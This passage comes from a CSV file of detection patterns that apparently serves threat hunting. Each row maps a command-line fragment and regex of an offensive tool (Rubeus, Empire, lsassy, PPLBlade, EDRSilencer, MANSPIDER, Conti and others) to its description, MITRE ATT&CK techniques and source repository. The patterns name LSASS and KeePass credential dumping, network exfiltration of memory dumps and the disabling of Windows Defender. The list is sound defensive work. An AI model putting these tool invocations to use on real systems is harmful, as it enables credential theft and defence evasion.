- T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* DPAPImk2john.py*",".{0,1000}\sDPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* dpipe.sh*",".{0,1000}\sdpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","0","N/A","N/A","1","62","27","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" "* dragoncastle.py*",".{0,1000}\sdragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "* DraytekScan*",".{0,1000}\sDraytekScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* drda-brute.nse*",".{0,1000}\sdrda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* drda-info.nse*",".{0,1000}\sdrda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DriverName *Xeroxxx*",".{0,1000}\sDriverName\s.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --drop-drag-and-drop-target*",".{0,1000}\s\-\-drop\-drag\-and\-drop\-target.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DSInternals.psd1*",".{0,1000}\sDSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "* dump * /service:*",".{0,1000}\sdump\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* dump --bucket *--dump-dir*",".{0,1000}\sdump\s\-\-bucket\s.{0,1000}\-\-dump\-dir.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "* dump.ps1*",".{0,1000}\sdump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --dump_file Keepass.exe.dmp*",".{0,1000}\s\-\-dump_file\sKeepass\.exe\.dmp.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* dump_memory64*",".{0,1000}\sdump_memory64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "* --dump-adcs*",".{0,1000}\s\-\-dump\-adcs.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* -DumpCerts *",".{0,1000}\s\-DumpCerts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -DumpCreds *",".{0,1000}\s\-DumpCreds\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* dumpCredStore.ps1*",".{0,1000}\sdumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "* --dump-gmsa*",".{0,1000}\s\-\-dump\-gmsa.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* --dump-laps*",".{0,1000}\s\-\-dump\-laps.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* DumpLsass.ps1*",".{0,1000}\sDumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* --dumpmode network --network raw --ip * --port *",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\sraw\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --dumpmode network --network smb *",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\ssmb\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --dump-name *lsass*",".{0,1000}\s\-\-dump\-name\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "* --dumpname lsass.dmp*",".{0,1000}\s\-\-dumpname\slsass\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* duplicates.nse*",".{0,1000}\sduplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dynasty.sh*",".{0,1000}\sdynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *",".{0,1000}\s\-e\sbat\scom\svbs\sps1\spsd1\spsm1\spem\skey\srsa\spub\sreg\stxt\scfg\sconf\sconfig\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *",".{0,1000}\s\-e\spfx\sp12\spkcs12\spem\skey\scrt\scer\scsr\sjks\skeystore\skey\skeys\sder\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -e ppk rsa pem ssh rsa*",".{0,1000}\s\-e\sppk\srsa\spem\sssh\srsa.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* e2e_test.py*",".{0,1000}\se2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* eap-info.nse*",".{0,1000}\seap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ebapc_injection.exe*",".{0,1000}\sebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* ebowla.py*",".{0,1000}\sebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "* edge logindata *",".{0,1000}\sedge\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* edge masterkey *",".{0,1000}\sedge\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* ediH:edoMwodniWwohS-*",".{0,1000}\sediH\:edoMwodniWwohS\-.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* edraser.py*",".{0,1000}\sedraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* EDRSilencer.c*",".{0,1000}\sEDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "* EfiDSEFix.cpp*",".{0,1000}\sEfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "* EfsPotato*",".{0,1000}\sEfsPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* Egress-Assess's FTP server*",".{0,1000}\sEgress\-Assess\'s\sFTP\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -ElevatedPersistenceOption *",".{0,1000}\s\-ElevatedPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 